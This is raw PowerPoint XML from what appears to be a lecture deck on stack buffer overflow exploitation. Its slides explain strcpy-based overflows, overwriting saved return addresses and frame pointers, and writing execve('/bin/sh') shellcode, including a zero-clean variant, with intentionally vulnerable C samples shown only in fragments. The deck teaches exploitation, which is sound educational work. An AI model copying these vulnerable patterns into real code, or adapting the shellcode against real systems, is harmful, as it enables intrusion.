                <a:tab pos="473257" algn="l"/>
                <a:tab pos="705420" algn="l"/>
                <a:tab pos="946513" algn="l"/>
                <a:tab pos="1178677" algn="l"/>
                <a:tab pos="1419770" algn="l"/>
                <a:tab pos="1660863" algn="l"/>
                <a:tab pos="1893026" algn="l"/>
                <a:tab pos="2134119" algn="l"/>
                <a:tab pos="2366283" algn="l"/>
                <a:tab pos="2607376" algn="l"/>
                <a:tab pos="2848469" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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137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13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213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256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05384">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="232164" algn="l"/>
                <a:tab pos="473257" algn="l"/>
                <a:tab pos="705420" algn="l"/>
                <a:tab pos="946513" algn="l"/>
                <a:tab pos="1178677" algn="l"/>
                <a:tab pos="1419770" algn="l"/>
                <a:tab pos="1660863" algn="l"/>
                <a:tab pos="1893026" algn="l"/>
                <a:tab pos="2134119" algn="l"/>
                <a:tab pos="2366283" algn="l"/>
                <a:tab pos="2607376" algn="l"/>
                <a:tab pos="2848469" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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13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13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13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213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]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="305384">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="232164" algn="l"/>
                <a:tab pos="473257" algn="l"/>
                <a:tab pos="705420" algn="l"/>
                <a:tab pos="946513" algn="l"/>
                <a:tab pos="1178677" algn="l"/>
                <a:tab pos="1419770" algn="l"/>
                <a:tab pos="1660863" algn="l"/>
                <a:tab pos="1893026" algn="l"/>
                <a:tab pos="2134119" algn="l"/>
                <a:tab pos="2366283" algn="l"/>
                <a:tab pos="2607376" algn="l"/>
                <a:tab pos="2848469" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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13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printf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137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"%s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137" b="1" dirty="0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sz="2137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137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05384">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="232164" algn="l"/>
                <a:tab pos="473257" algn="l"/>
                <a:tab pos="705420" algn="l"/>
                <a:tab pos="946513" algn="l"/>
                <a:tab pos="1178677" algn="l"/>
                <a:tab pos="1419770" algn="l"/>
                <a:tab pos="1660863" algn="l"/>
                <a:tab pos="1893026" algn="l"/>
                <a:tab pos="2134119" algn="l"/>
                <a:tab pos="2366283" algn="l"/>
                <a:tab pos="2607376" algn="l"/>
                <a:tab pos="2848469" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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137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137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05384">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="232164" algn="l"/>
                <a:tab pos="473257" algn="l"/>
                <a:tab pos="705420" algn="l"/>
                <a:tab pos="946513" algn="l"/>
                <a:tab pos="1178677" algn="l"/>
                <a:tab pos="1419770" algn="l"/>
                <a:tab pos="1660863" algn="l"/>
                <a:tab pos="1893026" algn="l"/>
                <a:tab pos="2134119" algn="l"/>
                <a:tab pos="2366283" algn="l"/>
                <a:tab pos="2607376" algn="l"/>
                <a:tab pos="2848469" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137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05384">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="232164" algn="l"/>
                <a:tab pos="473257" algn="l"/>
                <a:tab pos="705420" algn="l"/>
                <a:tab pos="946513" algn="l"/>
                <a:tab pos="1178677" algn="l"/>
                <a:tab pos="1419770" algn="l"/>
                <a:tab pos="1660863" algn="l"/>
                <a:tab pos="1893026" algn="l"/>
                <a:tab pos="2134119" algn="l"/>
                <a:tab pos="2366283" algn="l"/>
                <a:tab pos="2607376" algn="l"/>
                <a:tab pos="2848469" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="802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296902" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137" dirty="0"/>
              <a:t>This program is clearly vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="593803" lvl="1" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137" dirty="0" err="1"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137" dirty="0"/>
              <a:t> performs no bounds-checking, relying instead on finding a terminating null character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="593803" lvl="1" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137" dirty="0"/>
              <a:t>Input is untrusted, and could be longer than the size of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2137" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr sz="2137" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="296902" indent="-296902" defTabSz="390213">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2137" dirty="0"/>
              <a:t>Let's look at the mechanics of an exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400170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Vulnerable Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Shape 3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main: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callee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saves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allocate storage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+0x8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[1] to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  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0x4004c0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0x4004d0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puts(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set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0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deallocate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storage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restore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 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return?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414917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Smashing the Stack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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5315526" y="1690688"/>
            <a:ext cx="6335503" cy="45600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main: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callee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saves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allocate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[1]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0x4004c0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0x4004d0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puts(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set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deallocate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restore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return?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="396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4966" y="2279659"/>
            <a:ext cx="2856257" cy="30355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icture 39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21600000">
            <a:off x="5066513" y="2031994"/>
            <a:ext cx="498026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5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Smashing the Stack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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5315526" y="1690687"/>
            <a:ext cx="6335503" cy="45600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main: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callee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saves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allocate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[1]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0x4004c0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0x4004d0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puts(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set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deallocate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restore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return?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Picture 39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5066513" y="2580256"/>
            <a:ext cx="498026" cy="247665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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5455" y="2279660"/>
            <a:ext cx="2855278" cy="30344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1515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Smashing the Stack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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5315526" y="1690687"/>
            <a:ext cx="6335503" cy="45600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main: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callee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saves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allocate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[1]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0x4004c0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0x4004d0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puts(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set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deallocate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restore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return?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Picture 39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5066513" y="3415933"/>
            <a:ext cx="498026" cy="247665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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5455" y="2280700"/>
            <a:ext cx="2855278" cy="30344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88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Smashing the Stack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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5315526" y="1690687"/>
            <a:ext cx="6335503" cy="45600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main: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callee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saves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allocate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[1]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0x4004c0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0x4004d0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puts(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set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deallocate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restore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return?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Picture 39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5066513" y="3673067"/>
            <a:ext cx="498026" cy="247665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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5455" y="2279660"/>
            <a:ext cx="2855278" cy="30344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2896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Smashing the Stack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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5315526" y="1690687"/>
            <a:ext cx="6335503" cy="45600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main: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callee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saves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allocate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[1]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0x4004c0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0x4004d0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puts(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set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deallocate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restore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return?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Picture 39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5066513" y="4499890"/>
            <a:ext cx="498026" cy="247665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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5454" y="2280700"/>
            <a:ext cx="2855280" cy="30344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5173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Smashing the Stack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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5315526" y="1690687"/>
            <a:ext cx="6335503" cy="456009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main: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callee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saves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allocate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[1]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0x4004c0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move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0x4004d0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puts(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set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deallocate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storage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restore </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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return?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Picture 39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rot="21600000">
            <a:off x="5066513" y="5066475"/>
            <a:ext cx="498026" cy="247665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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5454" y="2279660"/>
            <a:ext cx="2855280" cy="30344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516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and Memory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and memory modeled on von Neumann architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Co-mingled code and data in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shared bus for code and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU has a program counter with address of next instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Repeated instruction cycles, usually pipelined loop (fetch → decode → execute)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set Architectures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(ISAs) have an operational semantics (input state → operation → output state)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98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Smashing the Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Shape 4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In the previous example, we overwrite the saved instruction pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>When the program returns from main, control transfers to a location of the attacker's choosing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Potential overwrite targets aren't limited to the IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Procedure arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>User data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1177976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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="359069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User Data Overwrites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Shape 440"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1819569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suid_cmd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const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user_input)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uid_t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uid;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buf[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64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uid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get_nobody();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strcpy(buf, user_input);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setuid(uid);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system(buf);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03211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Frame Pointer Overwrites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Shape 4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f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const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data)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buf[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256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i;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for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(i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 i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&lt;=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256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 i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++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buf[i]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data[i];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puts(buf);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main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argc,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argv)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f(argv[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665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Frame Pointer Overwrites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Shape 453"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179005" y="1344057"/>
            <a:ext cx="3808199" cy="490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f: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0x101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memcpy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puts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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Shape 454"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2204797" y="1344057"/>
            <a:ext cx="3808199" cy="490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main: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f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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="455" name="Picture 454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3892" y="5369087"/>
            <a:ext cx="504218" cy="247665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="457" name="Picture 456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69684" y="4136264"/>
            <a:ext cx="504218" cy="247665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="459" name="Picture 45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70232" y="2909667"/>
            <a:ext cx="504218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8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Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Shape 4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The classic attack when exploiting an overflow is to inject a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Sometimes called shellcode, since often the goal is to obtain a privileged shell (but not always!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Some defenses aim to prevent this stage of exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We will be writing our own payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Metasploit is cheating at this stage :-)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3383683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Writing Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Shape 4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6861" indent="-396861">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>What payload to inject?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We'll start by writing a classic shellcode for the example vulnerable program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="396861" indent="-396861">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Where is the payload located in memory?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We'll place our payload on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Requires that the stack is executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="396861" indent="-396861">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Where to place the address of the payload?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380748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Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Shape 4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launch_shell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void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path[]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"/bin/sh"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argv[]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 path, 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NULL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};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envp[]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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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NULL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};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execve(path, argv, envp);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main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argc, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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**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argv)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launch_shell();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274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Shellcode (Take 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Shape 477"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283794" y="1344057"/>
            <a:ext cx="4629570" cy="49067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 err="1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launch_shell</a:t>
            </a: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0x50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-0x28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-0x20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movabs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0x8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r8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ds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0x400704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r8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-0x20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-0x18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r8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-0x30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5A327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6262563" y="1575920"/>
            <a:ext cx="3719637" cy="490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r8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-0x38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edx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-0x30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-0x40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-0x48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memset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-0x48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-0x38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-0x40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execve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dword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ptr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-0x4c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0x50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rbp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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="482" name="Picture 48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6375" y="3633007"/>
            <a:ext cx="496388" cy="247665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="484" name="Picture 48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6375" y="4843802"/>
            <a:ext cx="496388" cy="24766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5600" y="3905449"/>
            <a:ext cx="496388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11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" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="484" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="9" grpId="0" animBg="1" advAuto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Shellcode Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Shape 4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The previous listing is close, but has problems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It references "/bin/sh" in the data segment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It calls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memset</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> in libc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It is verbose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="277803" indent="-277803">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We want to be as self-contained as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>i.e., position-independent, no libc, no data segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="277803" indent="-277803">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>The smaller the better</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Might have a small target buffer, or need to place many copies of the payload, or use a NOP sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98864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 err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t> (Take 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Shape 4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 err="1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launch_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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0x100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move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to a safe location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0x68732f6e69622f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/bin/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sh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+0x20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put /bin/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sh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pointer on stack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+0x20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 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get pointer to /bin/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sh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pointer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+0x10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put it on the stack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+0x18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0x00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terminate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+0x08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0x00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terminate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envp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+0x10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 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get pointer to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4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+0x08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   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get pointer to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envp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4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59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execve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is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syscall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59</a:t>
            </a:r>
            <a:endParaRPr sz="24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4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syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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2400" dirty="0" smtClean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execve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4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24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28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and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contains registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program counter (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, rip)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp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Frame pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 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General purpose registers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>abcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]x, r8-r15)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Condition codes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rflags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Stores results of arithmetic and logical operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory stores code and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Byte-addressable array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65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Zero-Clean Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Shape 5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Our shellcode is full of zeroes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>strcpy stops copying when reaching the end of the input – in this case, a null terminator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Creating "zero-clean" shellcode is a common requirement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Whenever payload is processed by a string operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Other operations might be performed on your buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Your exploit has to account for them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Zero-clean shellcode is only a special case of the more general payload constraint problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3598677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 err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t> (Take 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Shape 510"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
